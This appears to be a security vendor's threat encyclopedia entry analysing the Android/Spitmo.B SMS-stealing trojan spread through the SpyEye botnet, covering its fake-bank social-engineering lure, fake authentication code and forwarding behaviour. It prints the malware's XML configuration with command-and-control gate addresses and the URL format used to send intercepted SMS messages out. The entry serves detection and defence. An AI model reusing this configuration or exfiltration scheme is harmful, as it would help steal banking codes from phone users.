Threat Encyclopedia

Android/Spitmo.B!tr.spy

description-logoAnalysis

Android/Spitmo.B!tr.spy is a Trojan Spyware for Android mobile phones. It is particularly dangerous because it is known to be propagated by the SpyEye botnet kit, a famous rival of ZeuS. Like ZeuS, SpyEye focuses on password stealing. For more information on SpyEye, please follow this link.
Like ZeuS too, SpyEye is gaining interest in mobile phone victims and lures its victims in installing malicious applications such as Android/Spitmo.B!tr.spy.
In the case of Spitmo, the scenario is the following: from an infected PC, the victim visits his/her online bank website. The website looks very real, but it is not: the display, contents etc are controlled by the malware authors. They inform the victim a "new security measure" is being enforced, and that it consists in installing a "security" tool on the victim's phone to "prevent SMS interception".
But the tool actually does the contrary: it intercepts SMS and sends them to the malware authors.
To fulfill the "procedure" the malware authors ask the victims to call a given phone number (325000) to get an authentication code from the bank.


Figure 3. Victim dials 325000

Figure 4. A fake local authentication code is displayed.

The procedure seems genuine, but it is entirely fake: the victim sees only what malware authors tell him/her, and the authentication code is just a local popup (no communication with the bank whatsoever).
Subsequently, when the malware is installed, all SMS messages the victim receives are transferred to the malware authors. Consequently, when the victim receives a banking authentication code (or any payment code), the code is automatically and silently transferred to the malware authors.


Technical Details


The malware consists in a simple Android broadcast receiver and an XML settings file:
<?xml version="1.0" encoding="UTF-8"?>
<settings>
<send value="1"/>
<telephone value="123"/>
<http>
<addr value="http://[REMOVED]fsaf.com/sms/gate.php"/>
<addr value="http://[REMOVED]ff42.com/sms/gate.php"/>
<addr value="http://[REMOVED]fsaf.com/sms/gate.php"/>
<addr value="http://[REMOVED]ffa.com/sms/gate.php"/>
</http>
<tels>
</tels>
</settings>
The various addresses (addr field) will be added to an array of "servlets" the code maintains. Those are the remote addresses the malware should communicate with.
The "send" field has three possible values:
  • 1 for send information by HTTP
  • 2 for send information by HTTP and then by SMS
  • other values mean send information by SMS

The "telephone" field specifies the malware authors' phone number. This is where intercepted SMS messages are sent to (if sent by SMS).
Another field, not used in this default settings file, is named "tel" and corresponds to a list of SMS incoming phone numbers the malware should intercept. Those phone numbers are added to an array of "numbers" the code maintains. By default, the malware intercepts all SMS messages, and the array of numbers is empty.
Each time the infected phone receives an SMS, the malware reads the SMS and retrieves the originating phone number, the victim's phone number and the body of the SMS.
Then, the malware inspects its array of numbers. If this list contains a few phone numbers, the malware will only process incoming SMS messages whose originating phone number match with a number in the list. If the list is empty, the malware processes all incoming SMS messages.
Depending on the "send" field, processing an incoming SMS means forwarding its information by HTTP and/or SMS (see above).
If an incoming SMS is "forwarded" by HTTP, it is sent to all addresses (mentioned in the addr field) with an URL formatted as below:
http://ADDR?sender=ORIGINATING NUMBER&receiver=VICTIM NUMBER&text=SMS BODY

If an incoming SMS is forwarded by SMS, it is sent to the phone number specified in the "telephone" field.
The intercepted SMS messages are not shown on the victim's phone.
Finally, if the malware detects an outgoing call to 325000 (hard coded phone number), it simply toasts (i.e displays a message) a fake, hard-coded, authentication code (251340) on the victim's screen. This authentication code is fake, no communication is made.

recommended-action-logoRecommended Action

    FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
    FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.